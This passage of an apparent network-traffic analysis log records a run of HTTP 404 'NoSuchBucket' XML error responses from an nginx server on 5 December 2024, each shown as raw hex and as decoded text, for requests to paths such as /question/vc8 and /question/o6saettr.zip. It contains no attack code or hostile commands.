version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>345c5bc1-2412-0521-2547-0894eff93894</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:49 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32eda46f-2412-0521-2549-b4055d752c2cx-error-code: NoSuchBucketData Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 65 64 61 34 36 66 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 39 2d 62 34 30 35 35 64 37 35 32 63 32 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>32eda46f-2412-0521-2549-b4055d752c2c</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:54 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 2c86cd27-2412-0521-2554-5ca7213e02e6x-error-code: NoSuchBucketData Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 32 63 38 36 63 64 32 37 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 35 34 2d 35 63 61 37 32 31 33 65 30 32 65 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>2c86cd27-2412-0521-2554-5ca7213e02e6</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:56 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 76c934d1-2412-0521-2556-5ca7213e04ccx-error-code: NoSuchBucketData Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 39 33 34 64 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 35 36 2d 35 63 61 37 32 31 33 65 30 34 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>76c934d1-2412-0521-2556-5ca7213e04cc</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22080916-2b967e2Date: Thu, 05 Dec 2024 13:25:58 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: c02a0fea-2412-0521-2558-0894eff93358x-error-code: NoSuchBucketData Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 63 30 32 61 30 66 65 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 35 38 2d 30 38 39 34 65 66 66 39 33 33 35 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>c02a0fea-2412-0521-2558-0894eff93358</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:54 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 35eef701-2412-0521-2603-6c92bfce6724x-error-code: NoSuchBucketData Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 65 65 66 37 30 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 30 33 2d 36 63 39 32 62 66 63 65 36 37 32 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>35eef701-2412-0521-2603-6c92bfce6724</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:03 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 3461c14b-2412-0521-2605-0894eff939ccx-error-code: NoSuchBucketData Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 36 31 63 31 34 62 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 30 35 2d 30 38 39 34 65 66 66 39 33 39 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>3461c14b-2412-0521-2605-0894eff939cc</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:59 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 74772b1b-2412-0521-2607-047bcb4b651cx-error-code: NoSuchBucketData Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 37 37 32 62 31 62 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 30 37 2d 30 34 37 62 63 62 34 62 36 35 31 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>74772b1b-2412-0521-2607-047bcb4b651c</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:07 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 5a8ef9de-2412-0521-2609-6c92bfce66fex-error-code: NoSuchBucketData Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 61 38 65 66 39 64 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 30 39 2d 36 63 39 32 62 66 63 65 36 36 66 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>5a8ef9de-2412-0521-2609-6c92bfce66fe</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22080916-2b967e2Date: Thu, 05 Dec 2024 13:26:17 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: c02a2939-2412-0521-2617-0894eff93358x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 63 30 32 61 32 39 33 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 31 37 2d 30 38 39 34 65 66 66 39 33 33 35 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>c02a2939-2412-0521-2617-0894eff93358</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:18 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 2c86e030-2412-0521-2618-5ca7213e02e6x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 32 63 38 36 65 30 33 30 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 31 38 2d 35 63 61 37 32 31 33 65 30 32 65 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>2c86e030-2412-0521-2618-5ca7213e02e6</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:20 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 76c94694-2412-0521-2620-5ca7213e04ccx-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 39 34 36 39 34 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 32 30 2d 35 63 61 37 32 31 33 65 30 34 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>76c94694-2412-0521-2620-5ca7213e04cc</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:26 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32a99b11-2412-0521-2626-b4055d752a1dx-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 39 62 31 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 32 36 2d 62 34 30 35 35 64 37 35 32 61 31 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>32a99b11-2412-0521-2626-b4055d752a1d</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:19 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 3528eba9-2412-0521-2628-6c92bfce66d4x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 32 38 65 62 61 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 32 38 2d 36 63 39 32 62 66 63 65 36 36 64 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>3528eba9-2412-0521-2628-6c92bfce66d4</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:28 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 769b6110-2412-0521-2630-5ca7213e02f2x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 39 62 36 31 31 30 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 30 2d 35 63 61 37 32 31 33 65 30 32 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>769b6110-2412-0521-2630-5ca7213e02f2</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:31 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32a9dada-2412-0521-2634-b4055d752e03x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 64 61 64 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 34 2d 62 34 30 35 35 64 37 35 32 65 30 33 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>32a9dada-2412-0521-2634-b4055d752e03</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:26:27 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 7671a9bf-2412-0521-2636-3868dd5cd1c8x-error-code: NoSuchBucketData Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 37 31 61 39 62 66 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 36 2d 33 38 36 38 64 64 35 63 64 31 63 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>7671a9bf-2412-0521-2636-3868dd5cd1c8</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:37 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 7662ae9d-2412-0521-2637-28dee5e81b8dx-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 36 32 61 65 39 64 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 37 2d 32 38 64 65 65 35 65 38 31 62 38 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>7662ae9d-2412-0521-2637-28dee5e81b8d</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:26:40 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 5a8f2d5c-2412-0521-2640-6c92bfce66fex-error-code: NoSuchBucketData Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 61 38 66 32 64 35 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 30 2d 36 63 39 32 62 66 63 65 36 36 66 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> 